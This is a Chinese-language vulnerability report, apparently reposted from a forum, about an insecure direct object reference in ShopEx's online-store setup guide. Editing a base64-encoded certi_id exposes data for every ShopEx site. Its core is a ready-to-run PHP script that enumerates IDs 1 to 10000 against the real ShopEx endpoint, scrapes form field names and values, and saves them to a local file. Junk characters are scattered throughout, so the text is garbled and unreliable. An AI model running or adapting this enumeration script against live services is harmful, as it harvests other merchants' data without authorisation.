|
|
简要描述:
6 a0 V: X. |2 vShopEx某接口缺陷,可遍历所有网站) \& k2 _/ H/ q( i: p* d# V0 k: w
详细说明:4 L, {; C0 _; r4 V! w% ~5 f
问题出现在shopex 网店使用向导页面
6 T1 a) P; o& o( q6 i4 A' N! p3 Y
! U$ w6 L8 Y9 g& a% P" g* D. O1 L) k# D$ h
) A- ]7 P2 e2 S+ X* v
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=2 P$ w4 Q& c( T' J8 d7 c
6 Z# [, I: p6 K: ^; b5 H; t* h0 d) h
$ I9 m5 s% _- H
; d# U) y3 S" t; Z. P Frefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}4 N# K$ ^& G2 N
; y! ]% V6 e7 Z5 p+ R( }: \" |! \! z$ a
, m3 e& s$ |- U) {0 k& ?) R$ K; Q
0 ^+ g9 Q3 C8 q; j0 j) ~我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 4 R& \7 V' X: D, F. l2 d+ D
- e: K0 o8 D# A) d7 _1 ~5 r1 ^: ?3 g4 s* e5 \1 U7 s5 D
. B. j7 h; T- |
<?php6 T5 r6 _/ A; V5 l8 T/ N
$ z$ s( _; L# O8 e
for ($i=1; $i < 10000; $i++) { //遍历$ m* {! x+ O7 h$ f8 \, i0 ^: T
3 |' L: O+ e, t. C ShowshopExD($i);
) I4 o2 ^( ^0 }+ l3 ^5 O: m( y2 \! G @; `$ p. u- ~! T; M2 ?
}8 h/ a& P$ W9 ^8 u) R' B* `$ }
1 b: [3 y/ _* f" M
function ShowshopExD($cid) {8 K( o/ a6 `# ~
5 L- l2 ^! r- t( ~3 y $url='http://guide.ecos.shopex.cn/step2.php';
8 g& [3 d1 K+ t$ I0 ?- l/ l+ `& U! m1 K7 \
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
, F, W) z' y, l" l" }
- F ~7 f4 J+ [8 {6 A- f% e $url = $url.'?refer='.$refer;
& y- h2 J/ J+ l I
8 a) l; _. F0 }5 k; D M# n2 f; A $ch = curl_init($url);; ?) _8 {+ T7 [ G2 Q' l& J% k' _
, V. y& \4 U' a9 w
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
# \+ @: X9 @8 n% P) R9 J+ M# j
- r( I/ M' V6 I curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
# W! H3 i, g1 b- K. y) G4 n0 r, y- j" d; r* L8 U
$result = curl_exec($ch);5 o0 r6 D7 y$ y. P) G7 m
6 c# G, P* `; N
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
2 W/ A0 E( {8 j2 L0 Z9 t& P
& E; ~" A- u# A2 I9 L, M+ I4 ^ if(strpos($result,$refer))7 ~" O8 m" {8 [+ F
6 m) ? Y. n" J3 K
{
) y* n5 t/ m3 N& _
8 S( U4 u1 n! e- y- E $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
2 I$ f4 b# f* D/ }2 n
5 b- y7 K! _$ U- Y; q% V preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
/ E+ }1 m! I3 z# M& P' t1 y) O8 ]9 r; h
foreach ($value[1] as $key) {
$ e8 w) h. ?4 r' w3 n. o; ^: V- R/ g, _+ ^
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
9 O) X. q( Q+ r) J" ^
0 S2 [+ R w) V p# Y' a4 @" w7 R" J echo $res[1][0].':'.$res[3][0]."\r\n";
8 k+ v) S, G$ n- ]
9 m+ D9 h9 W. d! c; D $col =$res[1][0].':'.$res[3][0]."\r\n"; # `/ Z) p' a% ^) _( Q7 {
7 {' i+ Y8 `4 _/ P s/ q
fwrite($fp, $col, strlen($col)); 8 |" Q* ^% A4 Z r' Y
+ F" _$ q+ G7 v }
5 v7 z2 c; O8 }' s1 q8 Y# {1 Q0 {+ N1 [! f9 Y+ o, l/ q' [
echo '--------------------------------'."\r\n";
( S% n& i# f* X# S& x, r+ y/ @; [6 ]. O! @
fclose($fp);
% @4 H4 u8 e/ f' J) T! s* R6 G( W# z+ P* Q0 M8 M
}
/ v' M4 a4 U7 m% D2 [; C; p9 z
# V* ]( g' f( h3 } flush();$ V. P+ `/ [$ e/ p% _0 J
8 @2 X+ @$ p6 l) i# n curl_close($ch);
6 e) A2 S; o; f% c; y+ c# M
0 u+ n) ^9 T( ]) B. j0 I. S& e }
: q+ g" e9 |* N- l- |* G! }# Q& G% K, k: H( | l1 g
?>1 I' f0 b" P: Y5 Z- z/ @5 w
漏洞证明:- y9 N- k5 q/ X {( ^
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
, N7 r2 V, w- frefer换成其他加密方式
* q7 ?4 d8 T7 Z! u+ m ~ |
|